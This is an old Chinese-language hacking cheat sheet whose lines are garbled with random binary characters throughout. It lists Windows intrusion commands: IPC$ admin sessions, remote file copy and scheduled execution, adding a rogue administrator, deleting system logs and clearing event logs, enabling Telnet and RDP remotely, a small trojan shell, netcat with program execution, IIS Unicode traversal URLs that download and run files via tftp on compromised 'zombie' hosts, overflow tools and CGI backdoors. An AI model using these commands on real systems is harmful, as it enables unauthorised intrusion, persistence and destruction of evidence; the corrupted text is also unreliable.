网管和黑客都必须知道的命令
v_Y'o�
�_
常用的几条NET命令:
#�3ac�t�)m 3RTr��a��F (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
Gm1vV�HAxv r�n�C�u�=n (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
/4n�:!6r�t D�V!) n 6� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
d ;�W(Vm6� 5UH�xB"`C� (查看远程主机时间) net time \\IP地址
h�*����-j
<sq@[\l}a (定时启动某个程序) at \\IP地址 02:18 readme.exe
�$�I-i=:}g jN�A�^
(|: (查看共享) net view \\IP地址
d�>qx�aX;� |);-{=.OdQ (查看netbios工作组列表) nbtstat -A IP地址
^~%z�Plv �Skd�,=r�� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
y~\�K�~qjd Q.G6��y,KR (这两条把自己增加到管理员组): net user 用户名 密码 /add
u2��xb�^vu L
E>�A|M$X net localgroup Administrators 用户名 /add
~
-hH#��5� *qm�@;!�C� (断开连接) net use \\IP地址\ipc$ /delete
ij=}�3;L_!
x=(cQmQ�� 扫尾:
.\�>��I�- e.IK��mH]z del C:\winnt\system32\logfiles\*.*
=�K2mR}n\; D*R49hja{ del C:\winnt\ssytem32\config\*.evt
�hup<�U+�p ]h$,=Qf
hD del C:\winnt\system32\dtclog\*.*
'
Z}/3 d�p Dj�9).lgc del C:\winnt\system32\*.log
Zu/�}TS9bi 8�?r��RLM4 del C:\winnt\system32\*.txt
$lM�EZt8�A �r%/�*,lLO del C:\winnt\*.txt
H]7�;O�M/g 3yfq*\_uXw del C:\winnt\*.log
����)} H46 y�S[Z%]bvU 一、netsvc.exe
c{u~=24;%# 4F+n�`��{~ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
DEw_dO�J(� kt��;��|
$ netsvc /list \\IP地址
?�>W�4*8�( i>�C:��C>~ netsvc schedule \\IP地址 /query
;i�p"V� 0` �iPxhDn�<B netsvc \\IP地址 schedule /start
3S'juHT�e x`�vIY�-DS 二、OpenTelnet.exe
��*�SX'Or, �kMHup�ROj 远程启动主机的Telnet服务,并绑定端口到7878,例如:
H0�Yx�Pk) kgvB80�$�4 OpenTelnet \\IP地址 用户名 密码 1 7878
�I~$LI�dzw �,�/;mK_6� 然后就可以telnet到主机的7878端口,进入DOS方式下:
U8�z�$=W�o })R8VJ�&C/ telnet IP地址 7878
�Y�ol�O-5 -m:�i~^
u 三、winshell.exe
�d�4#Q<!r� �DV�NGV �� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
@]#�0ji��S vRL�kz4z � p Path (查看winshell主程序的路径信息)
�i~d�W)��7 aNpe�ePF)z b reBoot (重新启动机器)
[*���j�
�C �yuv�t<k�z d shutDown (关闭机器)
;u'mSJI��' tZ]|3�w�p� s Shell (执行后你就会看到可爱的“C:\>”)
*J��X�)q�� ~R]E=/��m| x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�{�Tp0#f�i p0x��d
c3� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
tj ,*-).4% E�g"DiI)�7 四、3389登陆器,GUI方式登录远程主机的
6Z�Bg�/_m� ,R�1`/a�Ry 五、elsave.exe
fa��#]G^�f Vs���~^r>� 事件日志清除工具
eiJO;%fl>l U-I���Lz�K elsave -s \\IP地址 -l "application" -C
Op�h4&Ip[w p1Q[c0�NMK elsave -s \\IP地址 -l "system" -C
n���Bd!296 u,�
%mVd elsave -s \\IP地址 -l "security" -C
X3�DXEeBEL .��F����0V 执行后成功清除应用程序日志,系统日志,安全日志
_�XtLO�-�D ��_��=1SR\ 六、hbulot.exe
�hv'��~S�� �.#�uRJo%8 开启win2kserver和winxp的3389服务
3,bA&c��3� oAX�-Sg-/$ hbulot [/r]
8{He���HU� �/LM*nN$%� 使用/r表示安装完成后自动重起目标使设置生效。
"3{��xa;�c .$DB\jJXjV 七、nc.exe(netcat.exe)
6u3DxFi�Tm xa`&/W��> 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�]],6Fi+�
>eg&i(C+ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�sQ/7Mc��� n*���^g^gp 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
e�i;��wT�� �oh�`���I$ 参数:
�~�F*p��V* sB_o
HUMH6 -e prog 程序重定向,一旦连接,就执行 [危险!!]
!Zb�NW4rIP U`JzE"ps�] -g gateway source-routing hop point[s], up to 8
�]�<q�{0.� �$V~r*�#$. -G num source-routing pointer: 4, 8, 12, ...
GA{>=�Q�_~ $EbxV�"�b+ -h 帮助信息
�2#Lc��L�
�J"8bRp=/| -i secs 延时的间隔
kL^�;^�!Nt )#�MKOsOct -l 监听模式,用于入站连接
|EaGKC�(
� V�uwBnQ.2k -n 指定数字的IP地址,不能用hostname
j?1\E9&4-Q 0k>��NuIIP -o file 记录16进制的传输
g/so3F%v
. �D�5)�qmu -p port 本地端口号
�9�U�6�y<X ;�h_"�5/# -r 任意指定本地及远程端口
mSAuS�)Y�D 8U�vf9�,I' -s addr 本地源地址
#6_?�7 �(X MC/$:P���V -u UDP模式
�sMli!���u #$�%��9XD3 -v 详细输出——用两个-v可得到更详细的内容
~)D2U:"^xm C81+n���R� -w secs timeout的时间
;)[RG���\� �bvn?�wK�� -z 将输入输出关掉——用于扫描时
E�$/`7p�8) 八、TFTPD32.EXE
�3=)��/�-l KO�<fN,D�R 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
zz�u�DI_,/ 1j6Z�SE/*| http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
<�\��?ySto Wt"@?#L��� 然后可以直接令文件运行:
n�.6�7f��� A�ynWs5|z= http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
|!dyk<}oIu m~���r^@D� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�a@�zKi�; \P!v9�LX�( 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��b]�~X
�U [+���gX6�� 一、一 Xscan命令行运行参数说明:
P�$2J`b[H$ 7'j?Gza�Q+ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
8 +xL�i4Pw ��WE4��:Jy 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
{�O�#=%o[� K�8{�j o�h xscan -file <主机列表文件名> <检测项目> [其他选项]
.%3b�X�K+F �mT5�d[�lz 其中<检测项目> 含义如下:
I1kx3CwJ{P �x� �3�#1� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
KwWqsu�j�u W+a>��*#*� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�� ~MyP4x/ �/J3e[?78u -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�X.,SXNS+B ��(SoV�2[| -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
;7 i0ko9� >�
z�h%CF$ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
v�@`�#!iu� �{{f%w$r�( [其他选项] 含义如下:
Lc�E!�e�%3 }@4m�@_gR? -v: 显示详细扫描进度
}0?6�42 =- +KD��B�^{ -p: 跳过Ping不通的主机
I5F��oh|)� h(]���O;a- -o: 跳过没有检测到开放端口的主机
nWbe=z&y8[ �0Apdh�wk~ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
